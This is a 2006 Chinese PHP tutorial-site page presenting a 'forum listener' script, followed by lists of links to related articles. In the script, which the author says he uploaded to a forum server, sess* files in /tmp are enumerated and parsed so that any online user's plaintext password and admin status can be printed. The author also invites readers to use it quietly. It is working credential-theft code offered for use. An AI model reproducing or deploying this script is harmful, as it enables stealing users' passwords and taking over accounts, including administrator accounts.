一个查看session内容的函数


Posted in PHP onOctober 09, 2006

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
  return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
利用PHP实现与ASP Banner组件相似的类
Oct 09 PHP
ajax+php打造进度条 readyState各状态
Mar 20 PHP
PHP 计算代码执行耗时的代码修正网上普遍错误
May 14 PHP
php调用MySQL存储过程的方法集合(推荐)
Jul 03 PHP
PHP中source #N问题的解决方法
Jan 27 PHP
PHP5.5在windows安装使用memcached服务端的方法
Apr 16 PHP
PHP获取短链接跳转后的真实地址和响应头信息的方法
Jul 25 PHP
php实现计数器方法小结
Jan 05 PHP
使用PHP生成PDF方法详解
Jan 23 PHP
通过修改配置真正解决php文件上传大小限制问题(nginx+php)
Sep 23 PHP
php搜索文件程序分享
Oct 30 PHP
PHP通过微信跳转的Code参数获取用户的openid(关键代码)
Jul 06 PHP
一个显示天气预报的程序
Oct 09 #PHP
web方式ftp
Oct 09 #PHP
php中文本数据翻页(留言本翻页)
Oct 09 #PHP
自己动手做一个SQL解释器
Oct 09 #PHP
GD输出汉字的函数的分析
Oct 09 #PHP
类的另类用法--数据的封装
Oct 09 #PHP
最小化数据传输――在客户端存储数据
Oct 09 #PHP
You might like
php全排列递归算法代码
2012/10/09 PHP
php导入导出excel实例
2013/10/25 PHP
实例讲解yii2.0在php命令行中运行的步骤
2015/12/01 PHP
php 文件下载 出现下载文件内容乱码损坏的解决方法(推荐)
2016/11/16 PHP
PHP的mysqli_set_charset()函数讲解
2019/01/23 PHP
PHP ElasticSearch做搜索实例讲解
2020/02/05 PHP
fckeditor 获取文本框值的实现代码
2009/02/09 Javascript
javascript计时器编写过程与实现方法
2016/02/29 Javascript
js提示框替代系统alert,自动关闭alert对话框的实现方法
2016/11/07 Javascript
Bootstrap选项卡动态切换效果
2016/11/28 Javascript
javaScript基础详解
2017/01/19 Javascript
JavaScript无阻塞加载和defer、async详解
2017/02/26 Javascript
nodejs中向HTTP响应传送进程的输出
2017/03/19 NodeJs
基于Nodejs的Tcp封包和解包的理解
2018/09/19 NodeJs
JS获取月的第几周和年的第几周实例代码
2018/12/05 Javascript
详解微信小程序实现仿微信聊天界面(各种细节处理)
2019/02/17 Javascript
如何自动化部署项目?折腾服务器之旅~
2019/04/16 Javascript
Vue常用传值方式、父传子、子传父及非父子实例分析
2020/02/24 Javascript
Angular+ionic实现折叠展开效果的示例代码
2020/07/29 Javascript
使用Python脚本将文字转换为图片的实例分享
2015/08/29 Python
打包python 加icon 去掉cmd黑窗口方法
2019/06/24 Python
Django+python服务器部署与环境部署教程详解
2020/03/30 Python
Jupyter Notebook的连接密码 token查询方式
2020/04/21 Python
Python爬虫爬取有道实现翻译功能
2020/11/27 Python
阿玛尼美妆英国官网:Giorgio Armani Beauty英国
2019/03/28 全球购物
explicit和implicit的含义
2012/11/15 面试题
药学专业大学生个人的自我评价
2013/11/04 职场文书
后勤部长岗位职责
2013/12/14 职场文书
高中军训感言500字
2014/02/24 职场文书
教师应聘自荐信范文
2014/03/14 职场文书
小班开学寄语
2014/04/04 职场文书
餐厅筹备计划书
2014/04/25 职场文书
优质服务活动实施方案
2014/05/02 职场文书
2014年十一国庆节活动方案
2014/09/16 职场文书
预备党员转正思想汇报
2014/09/26 职场文书
Nginx反向代理及负载均衡如何实现(基于linux)
2021/03/31 Servers